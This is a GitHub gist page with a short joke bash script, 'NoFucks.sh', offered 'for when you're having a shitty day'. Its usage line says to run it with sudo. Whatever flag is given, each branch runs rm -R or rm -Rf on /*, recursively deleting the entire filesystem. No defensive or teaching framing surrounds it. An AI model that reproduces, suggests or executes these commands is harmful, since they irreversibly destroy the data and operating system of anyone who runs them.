Created
April 12, 2016 18:24
-
-
Save BinaryBeard/e170f12e8dffbd252f078c5a1bb01063 to your computer and use it in GitHub Desktop.
For when you're having a shitty day
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Usage: sudo sh NoFucks.sh [--really, --watch-it-burn] | |
if [ "${1}" = '--really' ] ; then | |
rm -Rf /*; | |
elif [ "${1}" = '--watch-it-burn' ] ; then | |
rm -Rfv /*; | |
else | |
rm -R /*; | |
fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment